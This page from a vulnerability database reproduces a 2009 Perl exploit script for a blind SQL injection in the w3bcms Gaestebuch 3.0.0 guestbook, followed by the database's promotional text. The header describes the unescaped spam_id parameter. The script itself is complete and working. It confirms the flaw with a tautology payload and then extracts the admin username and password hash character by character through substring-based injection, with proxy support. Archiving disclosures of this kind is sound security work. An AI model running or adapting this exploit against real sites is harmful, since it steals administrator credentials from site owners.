Vulners
Lucene search
w3bcms Gaestebuch 3.0.0 - Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;
# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2oo9 |
# --------------------------------------------------
# | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |
# | (requires magic_quotes_gpc = Off) |
# --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 26.03.2009
# [!] Reported...: 29.03.2009
# [!] Response...: xx.xx.2009
#
# [!] Background.: CMS features in the frontend:
# » Ausgabe angelegter Seiten
# » Integrierter sicherer Spamschutz (kein Captcha!)
# » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige
# » Integrierter Besuchercounter (versteckt/sichtbar)
# <b>» Sicherheit gegen Hackangriffe</b>
# » Schnelle Datenbankabfragen
# » 100% Suchmaschinenoptimiert (SEO)
# » Erweiterbar durch Module & Addons
# » Unterstützt Mod Rewrite URL's (optional)
#
# [!] Bug........: $_POST['spam_id'] in includes/module/book/index.inc.php near line 42
#
# 37: } else if (isset($_GET['action']) && $_GET['action'] == "eintragen" && $modul_settings['aktiv'] == "0") {
# 38:
# 39: $_POST['spamschutz'] = mysql_real_escape_string($_POST['spamschutz']);
# 40: $_POST['spamschutz'] = strtolower($_POST['spamschutz']);
# 41:
# 42: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM spamschutz WHERE id='".$_POST['spam_id']."' AND antwort='".$_POST['spamschutz']."'"));
#
# [!] Solution...: no response from vendor but the vendor has updated the module package
#
if(!$ARGV[2])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ----------------oOO---(_)---OOo-----------------";
print "\n | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |";
print "\n | coded by DNX |";
print "\n ------------------------------------------------";
print "\n[!] Usage: perl w3bcms.pl [Target] <Options>";
print "\n[!] Example: perl w3bcms.pl -2 -u \"http://127.0.0.1/w3b/index.php?seite=2.gaestebuch\"";
print "\n[!] Targets:";
print "\n -1 Get admin username";
print "\n -2 Get admin password hash";
print "\n[!] Options:";
print "\n -u [url] URL to vuln website";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}
my %options = ();
GetOptions(\%options, "1", "2", "u=s", "p=s");
my $ua = LWP::UserAgent->new();
my $target = $options{"u"}."&action=eintragen";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
print "[!] Exploiting...\n";
check_bug($target);
if($options{"1"}) { get_username($target); }
elsif($options{"2"}) { get_password($target); }
print "\n[!] Exploit done\n";
sub check_bug
{
my $url = shift;
syswrite(STDOUT, "[!] Checking bug @ website: " , 28);
my $inj = "' or 1=1/*";
my $req = POST $url, [spam_id => $inj];
my $res = $ua->request($req);
if($res->content =~ /Bitte geben Sie Ihren Namen an/)
{
syswrite(STDOUT, "vuln", 4);
print "\n";
}
else
{
syswrite(STDOUT, "not vuln", 8);
exit;
}
}
sub get_username
{
my $target = shift;
syswrite(STDOUT, "[!] Get username: ", 18);
for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 32;
while(!$found && $h <= 126)
{
if(exploit($target, $i, $h, "benutzername"))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
sub get_password
{
my $target = shift;
syswrite(STDOUT, "[!] Get Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 48;
while(!$found && ($h <= 57 || $h <= 102))
{
if(exploit($target, $i, $h, "passwort"))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
if($h == 57)
{
$h = 97;
}
else
{
$h++;
}
}
}
}
sub exploit
{
my $url = shift;
my $i = shift;
my $h = shift;
my $c = shift;
my $inj = "' or 1=1 and substring((select ".$c." FROM admin limit 1),".$i.",1)=CHAR(".$h.")/*";
my $req = POST $url, [spam_id => $inj];
my $res = $ua->request($req);
if($res->content =~ /Bitte geben Sie Ihren Namen an/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2009-04-10]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1